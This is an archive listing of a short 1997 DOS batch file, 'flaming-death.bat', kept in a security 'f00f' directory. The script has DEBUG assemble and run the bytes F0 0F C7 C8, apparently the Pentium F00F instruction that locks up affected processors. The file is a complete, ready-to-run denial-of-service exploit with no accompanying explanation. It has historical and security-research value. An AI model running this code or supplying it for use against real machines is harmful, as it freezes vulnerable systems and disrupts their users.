home *** CD-ROM | disk | FTP | other *** search
/ linuxmafia.com 2016 / linuxmafia.com.tar / linuxmafia.com / pub / linux / security / f00f / flaming-death.bat < prev    next >
DOS Batch File  |  1997-11-10  |  95b  |  10 lines

  1.  
  2. set t=%TEMP%\t
  3. echo a > %t%
  4. echo dw 0ff0,c8c7 >> %t%
  5. echo. >> %t%
  6. echo g >> %t%
  7. debug < %t%
  8.  
  9.  
  10.